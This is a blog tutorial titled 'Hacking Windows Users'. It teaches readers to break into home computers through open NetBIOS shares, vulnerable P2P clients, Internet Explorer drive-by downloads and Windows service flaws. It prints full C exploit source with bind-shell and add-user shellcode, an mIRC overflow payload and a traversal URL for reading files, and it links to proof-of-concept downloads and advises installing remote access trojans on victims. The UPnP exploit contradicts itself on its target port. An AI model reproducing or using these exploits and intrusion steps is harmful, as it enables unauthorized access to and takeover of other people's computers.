google search

Custom Search

Monday, July 7, 2008

Hacking Windows Users
Section 1: The Introduction
----------------------------

This tutorial is concentrated on methods of infiltrating home users
using the oh so popular Windows operating system, since these users
tend to be ignorant of the vulnerabilities present on their computer
that can give a potential intruder open doorways into their personal
information. This tutorial will be broken up into different versions
of Windows, as well as different points of entry that are not due
to the operating system itself, but generated by actions of the user
him/herself. So sit back, read, and learn...


Section 2: Netbios
-------------------

There is hardly a soul alive who doesn't know about this problem, and
pretty much everybody and their mother has written a tutorial on
"netbios hacking" (seriously guys, do we really need this many netbios
tutorials circulating around?). Therefore, I will only make a brief
mention of this point of entry purely for the very few of you who may
have not heard of this issue. This problem generates from ignorant
users who enable file sharing on their LAN without setting permissions.
This comes to be, since many users who set up their LAN don't seem to
want to waste their time with having to push in a password every time
they want to get a file off a networked computer. However, what they
don't understand with this is that when they share a computer like
this, they are not only sharing information with other computers on
their LAN, but everybody else on the internet. Therefore, just as
easily as they can access files on their computer, so can the rest
of the world. The way that you, the intruder, would go about exploiting
this example of user ignorance is by first getting a port scanner if
you don't already have one. If you are a Windows user, probably your
best bet is to get IPEye. Though nmap is probably the best port scanner
out, it's Windows port is a tad unstable, and is not very reliable to
use. IPEye on the other hand has all the scan types of nmap, yet is
more robust and dependable than the nmap windows port. Anyways, upon
port scanning this computer you will be looking for port 139. There
is a scanner called XSharez Scanner that will scan a range of IP
addresses for the presense of this port. This is good to use if you
want to gain access into just anybody's information. Anyways, once you
find the presense of port 139 then you will go into command prompt
(Start/Run/type in "command" and press Enter) and type in "nbtstat
-A ip.address.here" and press Enter. A list will show up with shared
resource names, and the MAC address will be listed at the bottom. If
you see a shared name with <20> beside it,then you know that file
sharing is enabled. You will then go to c:\windows(or winnt)\ and go to
lmhosts and open it with notepad. Then go to the bottom of the file and
type in the victim's ip address, and save. Then go to
Start\Find\Computer and type in the ip address and click "Find Now".
Once the computer shows up you just double click it and you're in.
There are a few other ways to do this same task, but of course, there
are countless "netbios hacking" tutorials out there you can read to
find out about other methods for this task. So this concludes it for
this section, now onto other points of entry that are not quite so
commonly discussed.


Section 3: Peer-to-Peer File Sharing Clients
---------------------------------------------

Since the days of Napster, p2p file sharing has become quite the
craze, bringing piracy the the average household. With the click
of the mouse your average user can download games, movies, music, and
anything else under the sun without paying a penny, just as easy as
surfing the web. However what many users of such clients don't realize
is that they have much more to worry about with using such services
than just the RIAA. Many of these clients are not so securly put
together, leaving an open gateway for intrusion. One example of a
troublesome client is eMule. Versions of eMule earlier than 0.42a-d
and earlier are vulnerable to a buffer overflow flaw dealing with the
eMule web server enabled for file sharing that could allow you, the
intruder, to gain remote access into the remote computer. Though the
latest version of eMule fixes this issue, there are probably still
quite a few users out there who have not chosen to update. Below is
a script you can use to check for the presense of this troublesome
server....

script_description(english:desc["english"]);

summary["english"] = "Detect eMule Web Server";
script_summary(english:summary["english"]);

script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2004 A.Kaverin");
family["english"] = "Peer-To-Peer File Sharing";
script_family(english:family["english"]);
script_dependencies("find_service.nes");
script_require_ports(4711);
exit(0);
}


include("http_func.inc");

port = 4711;

if(! get_port_state(port)) exit(0);
banner = get_http_banner(port);
if ( banner && "eMule" >< banner )
{
security_warning(port);
}

exit(0);

If the presense of this server is found, then you can use the
following script provided to exploit this service...

/MIRCAlias { .quote PRIVMSG $1
$+(:,$chr(1),SENDLINK|, 90909090909090909090909090909090909090909090909090909090909
09090909090909090909090909090909090909090909090909090909090
9090909090909090909090909090909090EB0790907AF65700906681EC4
00031C96820210000684D756C656875722065686820796F685061746389E
2515152513EFF15C0E76100503EFF1568E46100909090909090909090909
090909090909090909090909090909090909090909090909090
9090909090909090909090909090909090909090909090909090,|,$chr(1))

Keep in mind, these are both mIRC scripts, so you would exploit them
via the irc service provided on eMule. The "MIRCAlias" above is
whatever alias you are going under at the time. The script listed above
exploits the DecodeBase16 buffer within the server to allow you to run
arbituary commands on the remote computer, that is if they are using
a vulnerable version. Another p2p client that we can use to our
advantage is BearShare, which is vulnerable with version 2.2.2 and
earlier. This exploit only works under the 9x/ME operating systems
however. Anyways, how we would exploit this is by opening up our
internet browser and typing in http://[victim]:6346/........../windows/win.ini or basically any
file we want to gain access to. This is because 2.2.2 and earlier
versions of BearShare don't seem to sanitize user input. This allows
any outside intruder (such as yourself perhaps) to use traversal
style attacks to access files on the remote computer. Also, another
great thing is even if none of these vulnerabilities are applicable,
most file sharing clients use http to host files from one user to
another. Therefore, you can simply start a transfer with another
user, then go to command prompt (Start/Run/type in "command" and press
Enter), and type in "netstat -n" and once again press Enter. Now while
any smart user will be smart about what he or she shares, there are
still a lot of users who don't seem to get this idea. Therefore, an
all too commonly made mistake for users to make is to share their
entire c: drive. In this case, the user him/herself has literally left
the door open for you to walk right in. All you have to do is open up
your internet browser and type in http://ip.address.here:[port # here].
Below is a list of default ports for different p2p services you can
use when using netstat for this purpose...

Gnutella: 6345, 6346, 6347, 6348, 6349
eDonkey: 4661, 4662, 4665
Kazaa: 80, 1214

Of course, http hosting does not hold true for all p2p clients, but
you can try your luck. Anyways, that concludes it for this section, so
onto the next section.


Section 4: Internet Explorer
----------------------------

In these times, using Internet Explorer as your default browser is
a very bad decision to make. There are so many vulnerabilities for
Internet Explorer right now, that using it is like leaving the door
wide open for anybody to just walk in. Even CERT (Computer Emergency
Readiness Team) has finally warned everybody to not use Internet
Explorer. However, does your average end user even listen? Not hardly.
Therefore, this issue remains a very common point of entry into your
average Windows home user. The task in exploiting Internet Explorer
is to trick it into dropping an executable onto the remote computer
so that we can run our favorite RAT server and setup a backdoor onto
the user's computer. First we can try exploiting it via object tags.
Go to the below link to get a proof of concept for this vulnerability.

http://www.geocities.com/protonigg3r/ie6-exedrop-asp-POC.zip

Just incorporate this vulnerability into your own web page, and then
add perhaps a cgi ip logger or such so that you can log the ip address
of the visitor so that you can connect to the server, and then when
they visit the page, just load up your RAT client and connect to the
newly established server (note: RAT means Remote Administration Tool,
trojan in lamemen's terms). Of course, maybe there is the off chance
that the user you are targeting has patched up this problem. In this
case, you can use a more recent vulnerability of this type. Go to the
below link to get a full report on this vulnerability...

http://62.131.86.111/analysis.htm

Or if you want to get straight to the point, you can find the proof
of concept to utilize at the below link...

http://62.131.86.111/security/idiots/repro/exploit.zip

Of course, this vulnerability is only as effective as the RAT you
choose is. If you use an obvious one like Sub7 then you will probably
not be successful. Even if the user you are targeting does not have
antivirus software installed, most ISPs block commonly used trojan
ports to thwart such activity. I can not choose a RAT for you. This
will be up to you, and will like many things in this sort of field of
activity be a trial and error process. Well that pretty much wraps it
up for this section. No matter how many security warnings are released
to the public, most people just don't listen. Therefore, this can be
a highly effective point of entry into someone's personal computer.
Now, onto our next section...


Section 5: Windows
-------------------

Of course, applications and configurations used aren't the only source
of such vulnerabilities. Windows itself can be a point of entry if
not properly patched. First lets get into the dcom vulnerability.
The Distributed Component Object Model service is a default service
on Windows NT, 2000, XP, and 2003 that allows for COM objects to
communicate over a network. This service can be exploited to allow
arbituary (remote) commands to be executed on the remote side. This
is the vulnerability that MyDoom used to distribute itself, so many
computers are already patched from this issue. However, there are
plenty that are not, so it's always nice to check. If you have a
specific user in mind, then you can use the following tool to check
if the user is vulnerable, and exploit the service if it is
vulnerable...

www.geocities.com/protonigg3r/rpcexploit.zip

You can also use the tool linked below to scan a range of ip addresses
for the presense of this vulnerability...

http://www.eeye.com/html/Research/Tools/RPCDCOM.html

Now let's discuss another vulnerability that affects Windows XP. The
UPnP (Universal Plug n' Play) service is ran by default on Windows
XP, which is used to establish seamless p2p networking between
disparate devices over a network. The idea to set this by default on
Windows XP was a huge mistake (typical Microsoft follies as usual).
To exploit this feature, we can use the below code...

/*

***************** EXPLOIT CODED BY JOCANOR *****************


this is a new and functional exploit for de vulnerability
affects to windows xp, at the service UPNP, port 5000.

this exploit is a part of ASQ12 project, same as XPhack.c coded
also be me...

you only type:

argoxp victimip

and later, in another cmd type:

nc victimip 1981

note:

you need netcat.

note2:

this exploit affects to windows xp + sp0 english version.

***************** EXPLOIT CODED BY ATLANTIS DUDE *****************

*/
#include
#include

#pragma comment(lib, "ws2_32")

char shell[] = //bind port 1981
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x66\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x70\x99\x98\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85"
"\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A"
"\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A"
"\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC"
"\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58"
"\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12"
"\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71"
"\xE5\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3"
"\x9D\xC0\x71\xF0\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66"
"\xCE\x69\x12\x41\x5E\x9E\x9B\x99\x9E\x24\xAA\x59\x10\xDE\x9D\xF3"
"\x89\xCE\xCA\x66\xCE\x6D\xF3\x98\xCA\x66\xCE\x61\xC9\xC9\xCA\x66"
"\xCE\x65\x1A\x75\xDD\x12\x6D\xAA\x42\xF3\x89\xC0\x10\x85\x17\x7B"
"\x62\x10\xDF\xA1\x10\xDF\xA5\x10\xDF\xD9\x5E\xDF\xB5\x98\x98\x99"
"\x99\x14\xDE\x89\xC9\xCF\xCA\xCA\xCA\xF3\x98\xCA\xCA\x5E\xDE\xA5"
"\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xCA\x66\xCE\x7D\xC9\x66\xCE\x71"
"\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32"
"\x7B\x77\xAA\x59\x5A\x71\x62\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6"
"\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9"
"\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA"
"\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8"
"\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC"
"\xED\xD8\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8"
"\xFA\xFA\xFC\xE9\xED\x99";


int main(int argc, char *argv[])

{

char recvbuf[1600];
char szRequest[2048];
char szJmpCode[281];
char szExeCode[840];
int i;
WSADATA wsa;
struct hostent *he;
struct sockaddr_in their_addr;
int len, sockfd;
short dport = 445;


printf("\n ArgoXP 1.0 beta \n");
printf(" ExPlOiT CoDeD By: JoCaNoR \n");
printf("Member of: SlackTeam...Jocanor, nkde, zet4 & zerok\n");
printf(" .-.-.Especial thanks to Neo_geno & Lide.-.-.\n\n");

if (argc < 2)
{
printf("How to use: ");
printf("Argoxp \n\n");
exit(0);
}


for(i=0; i<268; i++) szJmpCode[i]=(char)0x90;

szJmpCode[268]=(char)0x4D; szJmpCode[269]=(char)0x3F;
szJmpCode[270]=(char)0xE3; szJmpCode[271]=(char)0x77;
szJmpCode[272]=(char)0x90; szJmpCode[273]=(char)0x90;
szJmpCode[274]=(char)0x90; szJmpCode[275]=(char)0x90;


szJmpCode[276]=(char)0xFF; szJmpCode[277]=(char)0x63;
szJmpCode[278]=(char)0x64; szJmpCode[279]=(char)0x90;
szJmpCode[280]=(char)0x00;

for(i=0; i<32; i++) szExeCode[i]=(char)0x90;
szExeCode[32]=(char)0x00;

strcat(szExeCode, shell);
sprintf(szRequest, "%s%s\r\n\r\n", szJmpCode, szExeCode);

WSAStartup(MAKEWORD(2,0),&wsa);

if ((he=gethostbyname(argv[1])) == NULL)
{
perror("Unable to resolve");
exit(1);
}

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket error");
exit(1);
}

their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(dport);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);

printf("Waiting for connection...");
if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
{
printf("\nError, unable to connect!!!");
exit(1);
}

printf("Connected!!!\n");

if (send(sockfd, shell, sizeof(shell)-1, 0) == -1)
{
printf("Error :(:(:(\n");
exit(1);
}

printf("OoOoOps shell!!\n");
len = recv(sockfd, recvbuf, 1600, 0);

return 0;

}

//***************** EXPLOIT CODED BY ATLANTIS DUDE *****************

Of course, this vulnerability is not quite as common as it was at the
time when this vulnerability was notified to the security forums
(which was somewhere around 2001 I believe), but it can still be found
to be present on plenty of computers on the internet. Still, it's
much better to work with a more recent vulnerability. The HSC (Help
and Support Center) service is provided on Windows to help on a wide
variety of topics. This service is installed by default on XP and
Server 2003. This service is vulnerable to an argument injection
vulnerability that can allow you as an attacker to take control on
the remote side. There are quite a few proof of concepts at the below
link that you can use to exploit this service...

http://seclists.org/lists/bugtraq/2004/Mar/0307.html

Another service we can exploit is the Windows Messenger service, which
is a feature on most versions of Windows. With users running NT, XP,
2000, or Server 2003, this service can be exploited to gain remote
access. If you are looking for just any user that is exploitable
through this service, then once again we can rely on eEye to provide
us with a tool that we can use to scan a range of ip addresses for
the presense of this vulnerability, which you can find at the below
link...

http://www.eeye.com/html/Research/Tools/MSGSVC.html

Once such a vulnerable target is found, or if we already have our
target in mind, then we can use the below code to exploit this
feature...

/*******************************************************************/
/* [Crpt] MS03-043 - Messenger exploit by MrNice [Crpt] */
/* --------------------------------------------------------------- */
/* */
/* This Sploit use the unhandledexceptionfilter to redirect */
/* the execution. When overflow occur we have : */
/* */
/* mov eax,esi+8 */
/* mov ecx,esi+Ch */
/* mov dword ptr ds:[ecx],eax */
/* */
/* so we control ecx and edx and we can write 4 bytes */
/* where we want. */
/* If we try to write in a not writable memory zone, an */
/* excepetion is lauched and unhandledexceptionfilter too. */
/* */
/* A part of unhandledexceptionfilter : */
/* */
/* mov eax, dword_0_77ECF44C(=where) */
/* cmp eax, ebx */
/* jz short loc_0_77EA734C */
/* push esi */
/* call eax */
/* */
/* So we write the "WHAT"(=jmp esi+4Ch) at */
/* the "WHERE"(=77EA734C here) and when the exception occur */
/* the unhandledexceptionfilter is lauched so when call eax */
/* occur, it execute our code. */
/* */
/* Thx Kotik who coded the proof of concept,and Metasploit */
/* for Shellcode and last but not least kralor,Scurt from Crpt */
/* */
/* Tested on win2k FR SP0 */
/* */
/* */
/*******************************************************************/

#ifdef _WIN32
#include
#include
#pragma comment (lib,"ws2_32")
#else
#include
#include
#include
#include
#include
#include
#include
#include
#include
#endif
static unsigned char packet_header[] =
"\x04\x00\x28\x00"
"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
"\x4f\xb6\xe6\xfc"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\x00\x00";


unsigned char field_header[] =
"\xff\xff\xff\xff"
"\x00\x00\x00\x00"
"\xff\xff\xff\xff";

unsigned char ShellCode[] = // XorDecode 23 bytes
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3E\x01\x80\x34\x0A\x96\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
// AddUser:X Pass:X
"\xf0\x17\x7a\x16\x96\x1f\x70\x7e\x21\x96\x96\x96\x1f\x90\x1f\x55"
"\xc5\xfe\xe8\x4e\x74\xe5\x7e\x2b\x96\x96\x96\x1f\xd0\x9a\xc5\xfe"
"\x18\xd8\x98\x7a\x7e\x39\x96\x96\x96\x1f\xd0\x9e\xa7\x4d\xc5\xfe"
"\xe6\xff\xa5\xa4\xfe\xf8\xf3\xe2\xf7\xc2\x69\x46\x1f\xd0\x92\x1f"
"\x55\xc5\xfe\xc8\x49\xea\x5b\x7e\x1a\x96\x96\x96\x1f\xd0\x86\xc5"
"\xfe\x41\xab\x9a\x55\x7e\xe8\x96\x96\x96\x1f\xd0\x82\xa7\x56\xa7"
"\x4d\xd5\xc6\xfe\xe4\x96\xe5\x96\xfe\xe2\x96\xf9\x96\xfe\xe4\x96"
"\xf7\x96\xfe\xe5\x96\xe2\x96\xfe\xf8\x96\xff\x96\xfe\xfb\x96\xff"
"\x96\xfe\xd7\x96\xf2\x96\x1f\xf0\x8a\xc6\xfe\xce\x96\x96\x96\x1f"
"\x77\x1f\xd8\x8e\xfe\x96\x96\xca\x96\xc6\xc5\xc6\xc6\xc5\xc6\xc7"
"\xc7\x1f\x77\xc6\xc2\xc7\xc5\xc6\x69\xc0\x86\x1d\xd8\x8e\xdf\xdf"
"\xc7\x1f\x77\xfc\x97\xc7\xfc\x95\x69\xe0\x8a\xfc\x96\x69\xc0\x82"
"\x69\xc0\x9a\xc0\xfc\xa6\xcf\xf2\x1d\x97\x1d\xd6\x9a\x1d\xe6\x8a"
"\x3b\x1d\xd6\x9e\xc8\x54\x92\x96\xc5\xc3\xc0\xc1\x1d\xfa\xb2\x8e"
"\x1d\xd3\xaa\x1d\xc2\x93\xee\x97\x7c\x1d\xdc\x8e\x1d\xcc\xb6\x97"
"\x7d\x75\xa4\xdf\x1d\xa2\x1d\x97\x78\xa7\x69\x6a\xa7\x56\x3a\xae"
"\x76\xe2\x91\x57\x59\x9b\x97\x51\x7d\x64\xad\xea\xb2\x82\xe3\x77"
"\x1d\xcc\xb2\x97\x7d\xf0\x1d\x9a\xdd\x1d\xcc\x8a\x97\x7d\x1d\x92"
"\x1d\x97\x7e\x7d\x94\xa7\x56\x1f\x7c\xc9\xc8\xcb\xcd\x54\x9e\x96";


int main(int argc,char *argv[])
{
int i, packet_size, fields_size, s,sp;
unsigned char packet[8192];
struct sockaddr_in addr;
// A few conditions :
// 0 <= strlen(from) + strlen(machine) <= 56
// max fields size 3992
char from[] = "RECCA";
char machine[] = "ZEUS";
char body[4096] = "*** MESSAGE ***";
#ifdef _WIN32
WSADATA wsaData;
#endif

if(argc<2)
{
printf("\t [Crpt] MS03-043 - Messenger exploit by MrNice [Crpt]\n");
printf("\t\t www.coromputer.net && Undernet #coromputer\n");
printf("---------------------------------------------------------------\n");
printf("Tested on Windows 2000 French Sp0\n\n");
printf("Downloaded from www.K-OTik.com\n");
printf("Syntax : %s \n",argv[0]);
return -1;
}

#ifdef _WIN32
if(WSAStartup(0x101,&wsaData)) {
printf("error: unable to load winsock.\n");
return -1;
}
#endif

memset(&addr,0x00,sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(argv[1]);
addr.sin_port = htons(135);

memset(packet,0x00,sizeof(packet));
packet_size = 0;

memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1);
packet_size += sizeof(packet_header) - 1;

i = strlen(from) + 1;
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
strcpy(&packet[packet_size], from);
packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

i = strlen(machine) + 1;
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
strcpy(&packet[packet_size], machine);
packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

printf("Max 'body' size (incl. terminal NULL char) =
%d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header));
memset(body, 0x14, sizeof(body));


body[2263]=(char)0x90;
body[2264]=(char)0x90;
body[2265]=(char)0x90;
body[2266]=(char)0x90;

body[2267]=(char)0x90;
body[2268]=(char)0x90;

//jmp 8 bytes plus loing
body[2269]=(char)0xeb;
body[2270]=(char)0x08;

//WHAT CRYPTSVC.dll Win2k sp0 FRENCH
body[2271]=(char)0x48;
body[2272]=(char)0x65;
body[2273]=(char)0x87;
body[2274]=(char)0x76;

//WHERE win2k sp0 FRENCH
body[2275]=(char)0x4C;
body[2276]=(char)0xF4;
body[2277]=(char)0xEC;
body[2278]=(char)0x77;

for(i=2279;i<2606;i++)
body[i]=ShellCode[i-2279];

body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0';

i = strlen(body) + 1;
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
strcpy(&packet[packet_size], body);
packet_size += i;

fields_size = packet_size - (sizeof(packet_header) - 1);
*(unsigned int *)(&packet[40]) = time(NULL);
*(unsigned int *)(&packet[74]) = fields_size;

printf("Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from)
+ strlen(machine) + strlen(body), packet_size, fields_size);


if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
printf("error: unable to create socket\n");
return -1;
}

if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
printf("error: unable to send packet\n");
return -1;
}
return 0;
}

Well that concludes it for this section. There are plenty more
vulnerabilities that have been reported and released for different
versions of Windows, but the vulnerabilities that I explained are
the most recent of them. Therefore, these are the only ones that
really need any attention given to.


Section 6: Conclusion
----------------------

If you yourself are a Windows user, and any of this seems to bring
a chill up your spine, then I suggest consulting securityfocus.com
to learn how to secure your computer from such attacks. Another thing
I must note for those who are not going to get it, the code listed
in the "Windows" section is C source code, therefore, you need a C
compiler in order to utilize them. If you have a Linux distribution
handy, then you already have a compiler you can use. Otherwise, there
are a few Windows C compilers you can use as well. Anyways, I hope
this tutorial has educated you, as well as made you more security
aware.

No comments: